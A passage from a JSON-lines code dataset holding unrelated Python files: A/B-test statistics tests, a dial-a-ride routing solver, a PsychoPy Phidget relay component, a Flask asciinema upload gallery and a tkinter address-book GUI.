round_(reduced.at[1, \"v1_mean\"]) == 3.147058824\n assert round_(reduced.at[1, \"v1_stddev\"]) == 1.778805952\n assert reduced.at[1, \"total_users\"] == 640\n assert reduced.at[1, \"v1_users\"] == 340\n assert reduced.at[1, \"v1_total\"] == 1070\n assert reduced.at[1, \"baseline_users\"] == 300\n assert reduced.at[1, \"baseline_total\"] == 1010\n\n\ndef test_analyze_metric_df():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"one\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"one\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"one\",\n \"count\": 220,\n \"mean\": 3.5,\n \"stddev\": 2,\n \"users\": 2000,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"zero\",\n \"count\": 200,\n \"mean\": 3.7,\n \"stddev\": 2.1,\n \"users\": 2100,\n },\n ]\n )\n df = get_metric_df(rows, {\"zero\": 0, \"one\": 1}, [\"zero\", \"one\"], False, \"revenue\")\n result = analyze_metric_df(df, [0.5, 0.5], \"revenue\", False)\n\n assert len(result.index) == 2\n assert result.at[0, \"dimension\"] == \"one\"\n assert round_(result.at[0, \"baseline_cr\"]) == 0.245454545\n assert round_(result.at[0, \"baseline_risk\"]) == 0.186006962\n assert round_(result.at[0, \"v1_cr\"]) == 0.3\n assert round_(result.at[0, \"v1_risk\"]) == 0.00418878\n assert round_(result.at[0, \"v1_expected\"]) == 0.222222222\n assert round_(result.at[0, \"v1_prob_beat_baseline\"]) == 0.925127213\n\n\ndef test_adjusted_stats():\n adjusted = get_adjusted_stats(5, 3, 1000, 2000, False, \"revenue\")\n print(adjusted)\n assert adjusted[\"users\"] == 2000\n assert adjusted[\"mean\"] == 2.5\n assert round_(adjusted[\"stddev\"]) == 3.278852762\n assert adjusted[\"total\"] == 5000\n\n\ndef test_adjusted_stats_binomial():\n adjusted = get_adjusted_stats(1, 0, 1000, 2000, False, \"binomial\")\n print(adjusted)\n assert adjusted[\"users\"] == 2000\n assert adjusted[\"mean\"] == 1\n assert round_(adjusted[\"stddev\"]) == 0\n assert adjusted[\"total\"] == 1000\n\n\ndef test_adjusted_stats_ignore_nulls():\n adjusted = get_adjusted_stats(5, 3, 1000, 2000, True, \"revenue\")\n assert adjusted[\"users\"] == 1000\n assert adjusted[\"mean\"] == 5\n assert adjusted[\"stddev\"] == 3\n assert adjusted[\"total\"] == 5000\n\n\ndef test_process_users():\n vars = {\"zero\": 0, \"one\": 1}\n rows = pd.DataFrame(\n [{\"variation\": \"one\", \"users\": 120}, {\"variation\": \"zero\", \"users\": 100}]\n )\n users, unknown_variations = process_user_rows(rows, vars)\n\n assert users == [100, 120]\n assert unknown_variations == []\n\n\ndef test_process_users_unknown_vars():\n var_id_map = {\"zero\": 0, \"one\": 1}\n rows = pd.DataFrame(\n [{\"variation\": \"one\", \"users\": 120}, {\"variation\": \"zeros\", \"users\": 100}]\n )\n users, unknown_variations = process_user_rows(rows, var_id_map)\n\n assert users == [0, 120]\n assert unknown_variations == [\"zeros\"]\n\n\ndef test_process_metrics():\n rows = pd.DataFrame(\n [\n {\"variation\": \"one\", \"count\": 120, \"mean\": 2.5, \"stddev\": 1},\n {\"variation\": \"zero\", \"count\": 100, \"mean\": 2.7, \"stddev\": 1.1},\n ]\n )\n var_id_map = {\"zero\": 0, \"one\": 1}\n users = [1000, 1010]\n\n res = process_metric_rows(rows, var_id_map, users, False, \"revenue\")\n assert res.loc[0].at[\"users\"] == 1000\n assert res.loc[0].at[\"count\"] == 100\n assert res.loc[0].at[\"mean\"] == 0.27\n assert round_(res.loc[0].at[\"stddev\"]) == 0.881286938\n\n\ndef test_process_metrics_ignore_nulls():\n rows = pd.DataFrame(\n [\n {\"variation\": \"one\", \"count\": 120, \"mean\": 2.5, \"stddev\": 1},\n {\"variation\": \"zero\", \"count\": 100, \"mean\": 2.7, \"stddev\": 1.1},\n ]\n )\n var_id_map = {\"zero\": 0, \"one\": 1}\n users = [1000, 1010]\n\n res = process_metric_rows(rows, var_id_map, users, True, \"revenue\")\n assert res.loc[0].at[\"users\"] == 100\n assert res.loc[0].at[\"count\"] == 100\n assert res.loc[0].at[\"mean\"] == 2.7\n assert round_(res.loc[0].at[\"stddev\"]) == 1.1\n\n\ndef test_binomial_analysis():\n metric = pd.DataFrame(\n [\n {\"users\": 1000, \"count\": 120, \"mean\": 1, \"stddev\": 0, \"total\": 120},\n {\"users\": 1024, \"count\": 128, \"mean\": 1, \"stddev\": 0, \"total\": 128},\n {\"users\": 1000, \"count\": 102, \"mean\": 1, \"stddev\": 0, \"total\": 102},\n ]\n )\n var_names = [\"Control\", \"Variation 1\", \"Variation 2\"]\n res = run_analysis(metric, var_names, \"binomial\", False)\n\n baseline = res.loc[0]\n var1 = res.loc[1]\n var2 = res.loc[2]\n\n assert baseline.at[\"variation\"] == \"Control\"\n assert baseline.at[\"conversion_rate\"] == 0.12\n assert baseline.at[\"chance_to_beat_control\"] == None\n assert round_(baseline.at[\"risk_of_choosing\"]) == 0.069118343\n assert baseline.at[\"percent_change\"] == None\n\n assert var1.at[\"variation\"] == \"Variation 1\"\n assert var1.at[\"conversion_rate\"] == 0.125\n assert round_(var1.at[\"chance_to_beat_control\"]) == 0.633751254\n assert round_(var1.at[\"risk_of_choosing\"]) == 0.029338254\n assert round_(var1.at[\"percent_change\"]) == 0.041432724\n\n assert var2.at[\"variation\"] == \"Variation 2\"\n assert var2.at[\"conversion_rate\"] == 0.102\n assert round_(var2.at[\"chance_to_beat_control\"]) == 0.100849049\n assert round_(var2.at[\"risk_of_choosing\"]) == 0.182688464\n assert round_(var2.at[\"percent_change\"]) == -0.149376661\n\n\ndef test_gaussian_analysis():\n metric = pd.DataFrame(\n [\n {\"users\": 1000, \"count\": 120, \"mean\": 1.3, \"stddev\": 1, \"total\": 156},\n {\"users\": 1024, \"count\": 128, \"mean\": 1.29, \"stddev\": 0.9, \"total\": 165.12},\n {\"users\": 1000, \"count\": 102, \"mean\": 1.4, \"stddev\": 1.1, \"total\": 142.8},\n ]\n )\n var_names = [\"Control\", \"Variation 1\", \"Variation 2\"]\n res = run_analysis(metric, var_names, \"duration\", True)\n\n baseline = res.loc[0]\n var1 = res.loc[1]\n var2 = res.loc[2]\n\n assert baseline.at[\"variation\"] == \"Control\"\n assert baseline.at[\"per_user\"] == 0.156\n assert baseline.at[\"chance_to_beat_control\"] == None\n assert round_(baseline.at[\"risk_of_choosing\"]) == 0.138620458\n assert baseline.at[\"percent_change\"] == None\n\n assert var1.at[\"variation\"] == \"Variation 1\"\n assert var1.at[\"per_user\"] == 0.16125\n assert round_(var1.at[\"chance_to_beat_control\"]) == 0.593436958\n assert round_(var1.at[\"risk_of_choosing\"]) == 0.076604954\n assert round_(var1.at[\"percent_change\"]) == -0.007692308\n\n assert var2.at[\"variation\"] == \"Variation 2\"\n assert round_(var2.at[\"per_user\"]) == 0.1428\n assert round_(var2.at[\"chance_to_beat_control\"]) == 0.016533047\n assert round_(var2.at[\"risk_of_choosing\"]) == 0.702254931\n assert round_(var2.at[\"percent_change\"]) == 0.076923077\n","repo_name":"rameez-wed/growth-book","sub_path":"packages/stats/tests/test_gbstats.py","file_name":"test_gbstats.py","file_ext":"py","file_size_in_byte":11687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42012541399","text":"import argparse\nimport csv\nfrom typing import List, Dict, Tuple\nfrom parse_requests import Request, getRequests\nfrom gpu import GPU\n\nPoint = Tuple[int, int]\n\n\nclass DARP:\n def print_config(self):\n print(f\"number of requests => {self.n}\")\n print(f\"number of vehicles => {self.m}\")\n print(f\"Capacity of each vechicle => {self.Q}\")\n print(f\"area of service => {self.area_of_service} sq-kms\")\n print(f\"service duration => {self.service_duration} hrs\")\n\n def get_config(self):\n return {\n \"requests\": self.n,\n \"vehicles\": self.m,\n \"capacity\": self.Q,\n \"areaOfService\": self.area_of_service,\n \"serviceDuration\": self.service_duration\n }\n\n def __init__(self, noof_customers: int, service_duration: int, area_of_service: int,\n noof_vehicles: int, vechicleCapacity: int) -> None:\n self.service_duration = service_duration\n self.noof_customers = noof_customers\n self.area_of_service = area_of_service\n self.noof_vehciles = noof_vehicles\n self.V = [f\"v{v}\" for v in range(self.noof_vehciles)]\n self.T_route = int(self.service_duration * 60 * 60 * 0.50) # convert hrs to seconds\n # max ride of each passenger\n # IDEA: maybe we can do like alpha times * time from pickup to dropoff\n self.T_ride = 0.40 * self.T_route\n self.requests: List[Request] = getRequests(self.noof_customers, self.service_duration, self.area_of_service)\n # there are total of n requests, so n nodes\n # 1....n\n # 0 and 2n+1 are the depot\n self.n = len(self.requests)\n self.m = self.noof_vehciles\n self.start_depot = 0\n self.end_depot = 2 * self.n + 1\n self.Q = vechicleCapacity # capacity of each vechicle\n\n # build coordinates\n # each request has both pickup and dropoff coordinates\n # use +req.id as pickup as -req.id as dropoff\n self.coords: Dict[int, Point] = {}\n for req in self.requests[1:]:\n self.coords[req.id] = req.src_point()\n self.coords[-req.id] = req.dst_point()\n self.coords[self.start_depot] = self.requests[0].src_point()\n self.coords[self.end_depot] = self.requests[0].src_point()\n\n # service time at each node -> in minutes\n # this is something we came up with\n self.d: Dict[int, int] = {}\n for req in self.requests[1:]:\n self.d[req.id] = 2\n self.d[-req.id] = 2\n self.d[self.start_depot] = 2\n self.d[self.end_depot] = 2\n\n # load to carry\n self.q: Dict[int, int] = {}\n for req in self.requests[1:]:\n self.q[req.id] = req.load\n self.q[-req.id] = -req.load\n self.q[self.start_depot] = 0\n self.q[self.end_depot] = 0\n\n \"\"\"\n [e, l] represents a time window\n DAR system should pickup/dropoff customer\n at in this time window at respective node\n \"\"\"\n tw = {}\n # add 5 min time window\n offset = int(5 * 60)\n for req in self.requests[1:]:\n id = req.id\n tw[id] = (req.pickup_time, req.pickup_time + offset)\n tw[-id] = (req.dropoff_time, req.dropoff_time + offset)\n tw[self.start_depot] = (0, offset)\n tw[self.end_depot] = (self.T_route, self.T_route + offset)\n self.tw = tw\n\n \"\"\" wait times -> for now keep it 150 seconds, there is no wait times for drop nodes\"\"\"\n self.w = {}\n self.w[self.start_depot] = self.w[self.end_depot] = 0\n for req in self.requests:\n self.w[req.id] = 150\n self.w[-req.id] = 0\n\n def e(self, x):\n return self.tw[x][0]\n\n def l(self, x):\n return self.tw[x][1]\n\n def travel_time(self, one: int, two: int):\n pone = self.coords[one]\n ptwo = self.coords[two]\n return abs(pone[0] - ptwo[0]) + abs(pone[1] - ptwo[1])\n\n def check_time_feasibility(self, seq: List[int]):\n # 7-10 => ensure correct arrival, service and departure time\n # 7 -> for i, j => arrival at j <= start of service at j\n # departure from i + time for i-j = Arrival time at j <= start of service at j\n A = {}\n B = {}\n D = {}\n i = seq[0]\n A[i] = self.e(i)\n B[i] = A[i] + self.w[i] # w[i] will be zero if the i is pickup\n D[i] = B[i] + self.d[i]\n for i, j in zip(seq, seq[1:]):\n # there might be some wait time if the node is pickup\n A[j] = D[i] + self.travel_time(i, j)\n B[j] = A[j] + self.w[j]\n D[j] = B[j] + self.d[j]\n\n # print(seq)\n # pprint(A)\n # pprint(B)\n # pprint(D)\n # print(\"\\n\\n\")\n #\n # Equation 7\n for j in seq[1:]:\n if not A[j] <= B[j]:\n return False\n\n # Equation 8 => only for pickup nodes\n # time taken for start to j should be less than arrival of j and begging of j\n for i in seq:\n if i < 0:\n continue\n # assume we departure from D at 0th\n t = 0 + self.travel_time(self.start_depot, i)\n if not (t <= A[i] <= B[i]):\n return False\n\n # Equation 9 => only for dropoff\n for i in seq:\n if i >= 0:\n continue\n if not self.travel_time(i, self.end_depot) <= self.l(self.end_depot):\n return False\n\n # Equation 10\n for i in seq:\n if not (self.e(i) <= B[i] <= self.l(i)):\n return False\n\n # Equation 11\n for i in seq:\n if i >= 0:\n continue\n # begging of service at droff - departure from pickup should be <= max ride time\n if not B[i] - D[-i] <= self.T_ride:\n return False\n\n # TODO: Equation 12 => seems like we cannot apply this here\n return True\n\n def check_load_feasiblity(self, seq: List[int]):\n # CHECKS constraints 5, 6\n # load wheh leaving node i\n y: Dict[int, int] = {}\n y[seq[0]] = self.q[seq[0]]\n for prev, cur in zip(seq, seq[1:]):\n y[cur] = y[prev] + self.q[cur]\n\n # EQUATION 5, 6\n for i, j in zip(seq, seq[1:]):\n if not (y[i] + self.q[j] <= y[j]):\n return False\n if not (self.q[i] <= y[i] <= self.Q):\n return False\n return True\n\n def isV(self, x):\n return x >= self.n # returns true if the node is vehicle\n\n def isR(self, x):\n return not self.isV(x) # returns true if the node is request\n\n def writeToBenchmarkFile(self, filename, benchmark):\n print(f\"Writing benchmarks to \", filename)\n with open(filename, 'a') as f:\n w = csv.DictWriter(f, fieldnames=list(benchmark.keys()))\n w.writerow(benchmark)\n\n def objective_function(self, route, A, B, D, y):\n # EQ:1 in the paper\n w1 = 8\n w2 = 3\n w3 = 1\n w4 = 1\n w5 = 1\n alpha = 10000\n\n def c(): # routing costs\n total = 0\n for prev, cur in zip(route, route[1:]):\n total += self.travel_time(prev, cur)\n return total\n\n def r(): # excess ride time\n pickups = [x for x in route if x > 0]\n return sum(B[-i] - D[i] - self.travel_time(i, -i) for i in pickups)\n\n def l(): # wait time of passengers on board\n nodes = [x for x in route if x not in [self.start_depot, self.end_depot]]\n return sum(self.w[i]*(y[i] - self.q[i]) for i in nodes)\n\n def g(): # route durations\n return\n\n def e():\n return 0\n\n def k():\n return 0\n\n return w1 * c() + w2 * r() + w3 * l() + w4 * g() + w5 * e() + alpha * k()\n\n def evaluate_route(self, route: List[int]) -> bool:\n # Eight-step evaluation\n # compute following for each node\n \"\"\"\n Departure-prev ...Ride...Arrival..service..wait...Departure\n \"\"\"\n def calc(D0):\n A: Dict[int, int] = {route[0]: D0} # Arrival time\n w: Dict[int, int] = {route[0]: 0} # wait times\n B: Dict[int, int] = {route[0]: D0} # Beginning of service\n D: Dict[int, int] = {route[0]: D0} # Departure times\n y: Dict[int, int] = {route[0]: 0} # load at the time of leaving node x\n for prev, i in zip(route, route[1:]):\n # Arrival at i = Departure from previous node + travel time\n A[i] = D[prev] + self.travel_time(prev, i)\n # Beging service after the wait-time....\n # TODO: why do we have to wait here?\n B[i] = A[i] # + self.w[i]\n # after the service -> departure\n D[i] = B[i] + self.d[i]\n w[i] = B[i] - A[i]\n # load after leave i, since self.q can have negative values for the\n # dropoff nodes, this statement covers all cases\n y[i] = y[prev] + self.q[i]\n return A, w, B, D, y\n\n A, w, B, D, y = calc(self.e(route[0]))\n for i in route:\n if not B[i] <= self.l(i) and y[i] <= self.Q:\n return False\n\n # make the moves\n for j_idx, j in enumerate(route):\n Fj = self.forward_slack_time(route, j, w, B, D[route[-1]])\n w[j] = w[j] + min(Fj, sum(w[p] for p in route[j_idx+1:-1]))\n B[j] = A[j] + w[j]\n D[j] = B[j] + self.d[j]\n for prev, i in zip(route[j_idx:], route[j_idx+1: ]):\n # TODO: duplicate code\n A[i] = D[prev] + self.travel_time(prev, i)\n # Begin service after the wait-time....\n B[i] = A[i] # + self.w[i]\n # after the service -> departure\n D[i] = B[i] + self.d[i]\n w[i] = B[i] - A[i]\n Ti_ride = [A[-abs(i)] - B[abs(i)] for i in route[j_idx+1:-1]]\n if all([ride <= self.T_ride for ride in Ti_ride]):\n return True\n return False\n\n def forward_slack_time(self, route: List[int], i: int, w: Dict[int, int], B: Dict[int, int], T_Trip: int):\n # so this is basically cummulative waiting times and the difference between end of time window and start of\n # it is min of all slacks at node j\n # reference: https://logistik.bwl.uni-mainz.de/files/2018/12/LM-2015-01-revised.pdf\n q = route[-1]\n res = float('inf')\n i_idx = route.index(i)\n for j_idx in range(i_idx, len(route)):\n # j is some point between and i and q\n # calculate all the waittimes between i and j\n wait_times = [w[route[x]] for x in range(i_idx, j_idx + 1)]\n tw_slack = self.l(route[j_idx]) - B[route[j_idx]]\n res = min(res, sum(wait_times) + tw_slack)\n return res\n\n def start(self):\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--noof_customers', required=True, type=int, help='noof customers')\n parser.add_argument('-d', '--service_duration', type=int, help='service duration', required=True)\n parser.add_argument('-a', '--area_of_service', type=int, help='area of service', required=True)\n parser.add_argument('-v', '--noof_vehicles', required=True, type=int, help='noof vehicles')\n parser.add_argument('-Q', '--vehicle_capacity', required=True, type=int, help='vehicle capacity')\n args = parser.parse_args()\n darp = DARP(args.noof_customers, args.service_duration, args.area_of_service, args.noof_vehicles,\n args.vehicle_capacity)\n benchmarking = darp.get_config()\n gpu = GPU(darp)\n init_solution = gpu.construction_kernel()\n print(init_solution)\n solution = gpu.local_search_kernel(init_solution)\n print(solution[1])\n print(solution[0])\n print('done')\n\n","repo_name":"nraghuveer/Dail-A-Ride-TabuSearch-CPU","sub_path":"src/darp.py","file_name":"darp.py","file_ext":"py","file_size_in_byte":11971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13356450310","text":"from psychopy.experiment.components import BaseComponent, Param, _translate\nfrom psychopy import prefs, logging\n\n#Modeled after qmix/pump\n\nfrom pathlib import Path\nfrom psychopy.localization import _localized as __localized\n_localized = __localized.copy()\n\n_localized.update({'channelList': _translate('Channel List'),\n 'serialNumber': _translate('Serial Number'),\n 'reversedRelay': _translate('Reversed Relay'),\n 'syncToScreen': _translate('Sync to screen')\n })\n\nclass PhidgetRelayComponent(BaseComponent):\n \"\"\"Operate a Phidget Relay (0/0/4) or (0/0/8)\"\"\"\n targets = ['PsychoPy']\n categories = ['I/O']\n iconFile = Path(__file__).parent / 'phidgets.png'\n tooltip = _translate('Phidget: control operant chamber events using (a) relay(s)')\n\n def __init__(self, exp, parentName, name='phidgetRelay',\n startType='time (s)', startVal=0.0,\n stopType='duration (s)', stopVal=3.0,\n startEstim='', durationEstim='',\n channelList='',\n serialNumber='',\n reversedRelay=False,\n syncToScreen=True):\n\n super(PhidgetRelayComponent, self).__init__(\n exp, parentName, name,\n startType=startType, startVal=startVal,\n stopType=stopType, stopVal=stopVal,\n startEstim=startEstim, durationEstim=durationEstim)\n\n self.type = 'PhidgetRelay'\n self.url = 'https://www.psychopy.org/builder/components/phidget.html'\n\n self.exp.requireImport(importName='PhidgetOutputComponent',\n importFrom='psychopy.hardware')\n\n # Order in which the user-settable parameters will be displayed\n # in the component's properties window.\n self.order += ['syncToScreen', # Basic tab\n 'channelList', 'serialNumber', 'reversedRelay', # Hardware tab\n ]\n\n self.params['channelList'] = Param(\n channelList, categ='Hardware',\n valType='list', inputType=\"single\",\n hint=_translate('The list of channels controlled by this component'),\n label=_localized['channelList'])\n\n self.params['serialNumber'] = Param(\n serialNumber, categ='Hardware',\n valType='num', inputType=\"int\",\n hint=_translate('Serial number for your Phidget Output relay (leave empty if only one Phidget attached to PC)'),\n label=_localized['serialNumber'])\n\n self.params['reversedRelay'] = Param(\n reversedRelay, categ='Hardware',\n valType='bool', inputType=\"bool\", allowedVals=[True, False],\n hint=_translate('Set reversed if you want the relay to start on and turn off for the indicated duration'),\n label=_localized['reversedRelay'])\n\n self.params['syncToScreen'] = Param(\n syncToScreen, valType='bool', inputType=\"bool\", categ='Basic',\n allowedVals=[True, False],\n hint=_translate('Sync relay events to the screen refresh'),\n label=_localized['syncToScreen'])\n\n def writeRunOnceInitCode(self, buff):\n code = ('# Initialize relays LALALALAL\\n'\n '%(name)s = PhidgetOutputComponent(channelList = %(channelList)s, '\n 'serialNumber = %(serialNumber)s, '\n 'reversedRelay = %(reversedRelay)s)\\n'\n % self.params )\n buff.writeOnceIndentedLines(code)\n\n def writeRoutineStartCode(self, buff):\n \"\"\"Write the code that will be called at the start of the routine.\n \"\"\"\n\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n def writeFrameCode(self, buff):\n \"\"\"Write the code that will be called every frame.\n \"\"\"\n\n\n buff.writeIndented(\"# *%s* updates\\n\" % (self.params['name']))\n self.writeStartTestCode(buff)\n buff.writeIndented(\"%(name)s.status = STARTED\\n\" % self.params)\n\n if self.params['syncToScreen'].val:\n code = ('\\n'\n 'win.callOnFlip(%(name)s.closeRelay)\\n'\n % self.params)\n else:\n code = ('\\n'\n '%(name)s.closeRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n buff.setIndentLevel(-1, relative=True)\n\n # Test for stop (only if there was some setting for duration or\n # stop).\n if self.params['stopVal'].val not in ['', None, -1, 'None']:\n self.writeStopTestCode(buff)\n buff.writeIndented(\"%(name)s.status = FINISHED\\n\" % self.params)\n\n if self.params['syncToScreen'].val:\n code = ('\\n'\n 'win.callOnFlip(%(name)s.openRelay)\\n'\n % self.params)\n else:\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n buff.setIndentLevel(-2, relative=True)\n\n\n def writeRoutineEndCode(self, buff):\n #Leave the relay in the default state\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n # get parent to write code too (e.g. store onset/offset times)\n super().writeRoutineEndCode(buff)\n\n def writeExperimentEndCode(self, buff):\n #Leave the relay in the default state\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n # get parent to write code too (e.g. store onset/offset times)\n super().writeExperimentEndCode(buff)","repo_name":"maqadri/psychopy-phidgets","sub_path":"psychopy_phidgets/component/phidgets.py","file_name":"phidgets.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39778431761","text":"from flask import Flask, render_template, request,send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom datetime import datetime\nimport os\nimport json\nfrom uuid import uuid4\n\n\napp = Flask(__name__)\nCastsFile = os.path.join(app.root_path, 'static','castinfo','casts.json')\n\nif os.path.isfile(CastsFile):\n\ttry:\n\t\twith open(CastsFile) as casts:\n\t\t\tCastCache = dict(json.loads(casts.read()))\n\texcept:\n\t\tCastCache = {}\n\nelse:\n\tprint('No casts available!')\n\tCastCache = {}\n\nprint(CastCache)\n\n@app.route(\"/favicon.ico\")\ndef favicon():\n\treturn send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico',mimetype='image/vnd.microsof.icon')\n\n@app.route('/', methods = ['GET','POST'])\ndef index():\n\tif request.method == 'GET':\n\t\treturn render_template('index.html', ASCIINEMAS = CastCache)\n\telse:\n\t\tprint(request.files)\n\t\t\n\t\tfile = request.files['file']\n\t\ttitle = request.form.get('title','N.A.')\n\t\tdescription = request.form.get('description','N.A.')\n\t\tfile_uuid = str(uuid4()) + '.cast'\n\t\tfile.save(os.path.join(app.root_path, 'static','cast', file_uuid))\n\t\tCastCache.update({file_uuid:{\"Title\":title,\"Description\":description,\"Date\":str(datetime.now())}})\n\t\twith open(CastsFile,'w') as casts:\n\t\t\tjson.dump(CastCache,casts)\n\t\treturn 'OK'\n\n#r = requests.post(url, files=files, data=values)\n\nif __name__ == '__main__':\n\tapp.run(host = '0.0.0.0', port = 8000)","repo_name":"r3ap3rpy/asciinema-gallery","sub_path":"asciigallery.py","file_name":"asciigallery.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11874026184","text":"import tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox as msgBox\nfrom typing import Callable\n\n\nclass ViewTab1(ttk.Frame):\n def __init__(self, root):\n super().__init__()\n root.add(self, text=\"Edit\")\n self.root = root\n self.currentId = None # trying to keep track of the instance\n\n self.columnconfigure(0, weight=1)\n self.columnconfigure(1, weight=1)\n self.columnconfigure(2, weight=1)\n\n self.labelFont = (\"Arial\", 14)\n self.entryFont = (\"Arial\", 14)\n self.padding = {\"padx\": 5, \"pady\": 5}\n\n # labels:\n self.labelFirstName = ttk.Label(self, text=\"First Name:\", font=self.labelFont)\n self.labelFirstName.grid(column=0, row=1, sticky=tk.W, **self.padding)\n\n self.labelLastName = ttk.Label(self, text=\"Last Name:\", font=self.labelFont)\n self.labelLastName.grid(column=0, row=2, sticky=tk.W, **self.padding)\n\n self.labelbirthday = ttk.Label(self, text=\"Birthday:\", font=self.labelFont)\n self.labelbirthday.grid(column=0, row=3, sticky=tk.W, **self.padding)\n\n self.labelStreet = ttk.Label(self, text=\"Street:\", font=self.labelFont)\n self.labelStreet.grid(column=0, row=4, sticky=tk.W, **self.padding)\n\n self.labelZip = ttk.Label(self, text=\"ZIP:\", font=self.labelFont)\n self.labelZip.grid(column=0, row=5, sticky=tk.W, **self.padding)\n\n self.labelCity = ttk.Label(self, text=\"City:\", font=self.labelFont)\n self.labelCity.grid(column=0, row=6, sticky=tk.W, **self.padding)\n\n self.labelCountry = ttk.Label(self, text=\"Country:\", font=self.labelFont)\n self.labelCountry.grid(column=0, row=7, sticky=tk.W, **self.padding)\n\n self.labelEmail = ttk.Label(self, text=\"Email:\", font=self.labelFont)\n self.labelEmail.grid(column=0, row=8, sticky=tk.W, **self.padding)\n\n self.labelPhone = ttk.Label(self, text=\"Phone:\", font=self.labelFont)\n self.labelPhone.grid(column=0, row=9, sticky=tk.W, **self.padding)\n\n # entries:\n self.entryFirstName = ttk.Entry(self, font=self.entryFont)\n self.entryFirstName.grid(column=2, row=1, sticky=tk.E, **self.padding)\n\n self.entryLastName = ttk.Entry(self, font=self.entryFont)\n self.entryLastName.grid(column=2, row=2, sticky=tk.E, **self.padding)\n\n self.entryBirthday = ttk.Entry(self, font=self.entryFont)\n self.entryBirthday.grid(column=2, row=3, sticky=tk.E, **self.padding)\n\n self.entryStreet = ttk.Entry(self, font=self.entryFont)\n self.entryStreet.grid(column=2, row=4, sticky=tk.E, **self.padding)\n\n self.entryZip = ttk.Entry(self, font=self.entryFont)\n self.entryZip.grid(column=2, row=5, sticky=tk.E, **self.padding)\n\n self.entryCity = ttk.Entry(self, font=self.entryFont)\n self.entryCity.grid(column=2, row=6, sticky=tk.E, **self.padding)\n\n self.entryCountry = ttk.Entry(self, font=self.entryFont)\n self.entryCountry.grid(column=2, row=7, sticky=tk.E, **self.padding)\n\n self.entryEmail = ttk.Entry(self, font=self.entryFont)\n self.entryEmail.grid(column=2, row=8, sticky=tk.E, **self.padding)\n\n self.entryPhone = ttk.Entry(self, font=self.entryFont)\n self.entryPhone.grid(column=2, row=9, sticky=tk.E, **self.padding)\n\n # buttons:\n self.buttonSubmit = tk.Button(self, text=\"Submit\", width=15)\n self.buttonSubmit.grid(column=2, row=10, sticky=tk.SE, **self.padding)\n\n self.buttonClear = tk.Button(self, text=\"Clear\", width=15)\n self.buttonClear.grid(column=2, row=10, sticky=tk.S, **self.padding)\n\n def hook_controls(self, controller):\n self.controller = controller\n self.buttonClear.configure(command=self.button_clear)\n self.buttonSubmit.configure(command=self.button_submit)\n\n def _load_single(self, id):\n self._clear_all_entries()\n address = self.controller.load_single_address(id)\n\n # self.entryFirstName.delete(0, \"end\")\n self.currentId = address.id\n self.entryFirstName.insert(0, (address.firstName or \"\"))\n self.entryLastName.insert(0, (address.lastName or \"\"))\n self.entryBirthday.insert(0, (address.birthday or \"\"))\n self.entryStreet.insert(0, (address.street or \"\"))\n self.entryCity.insert(0, (address.city or \"\"))\n self.entryZip.insert(0, (address.zip or \"\"))\n self.entryCountry.insert(0, (address.country or \"\"))\n self.entryEmail.insert(0, (address.email or \"\"))\n self.entryPhone.insert(0, (address.phone or \"\"))\n\n def button_submit(self, event: tk.Event = None):\n print(\"button submit\")\n\n if self.currentId is not None:\n answer = msgBox.askquestion(\n title=\"Update\",\n message=f\"Do you want to change the existing id { self.currentId }?\",\n icon=\"warning\",\n )\n if answer == \"no\":\n return\n\n input = {\n \"id\": self.currentId,\n \"firstName\": str.strip(self.entryFirstName.get()) or None,\n \"lastName\": str.strip(self.entryLastName.get()) or None,\n \"birthday\": str.strip(self.entryBirthday.get()) or None,\n \"street\": str.strip(self.entryStreet.get()) or None,\n \"zip\": str.strip(self.entryZip.get()) or None,\n \"city\": str.strip(self.entryCity.get()) or None,\n \"country\": str.strip(self.entryCountry.get()) or None,\n \"email\": str.strip(self.entryEmail.get()) or None,\n \"phone\": str.strip(self.entryPhone.get()) or None,\n }\n\n if self.controller.submit_input(input):\n msgBox.showinfo(title=\"Success\", message=\"Input was accepted\")\n self._clear_all_entries()\n else:\n msgBox.showerror(title=\"Nope\", message=\"Input cannot be accepted\")\n\n def button_clear(self):\n self._clear_all_entries()\n\n def _clear_all_entries(self):\n self.currentId = None\n for widget in self.winfo_children():\n if isinstance(widget, tk.Entry):\n widget.delete(0, tk.END)\n\n\nclass ViewTab2(ttk.Frame):\n def __init__(self, root):\n super().__init__()\n root.add(self, text=\"View\")\n\n # self.columnconfigure(0, weight=3)\n # self.columnconfigure(1, weight=1)\n self.padding = {\"padx\": 5, \"pady\": 5}\n\n # create Treeview:\n self.cols = [\n \"id\",\n \"firstName\",\n \"lastName\",\n \"birthday\",\n \"street\",\n \"zip\",\n \"city\",\n \"country\",\n \"email\",\n \"phone\",\n ]\n\n self.myTable = ttk.Treeview(\n self, columns=self.cols, show=\"headings\", height=15, selectmode=\"browse\"\n )\n\n # set headings:\n for col in self.cols:\n self.myTable.column(col, width=75)\n self.myTable.heading(col, text=col)\n\n self.myTable.grid(row=0, column=0, columnspan=2)\n\n # buttons:\n self.buttonDelete = tk.Button(self, text=\"Delete\", 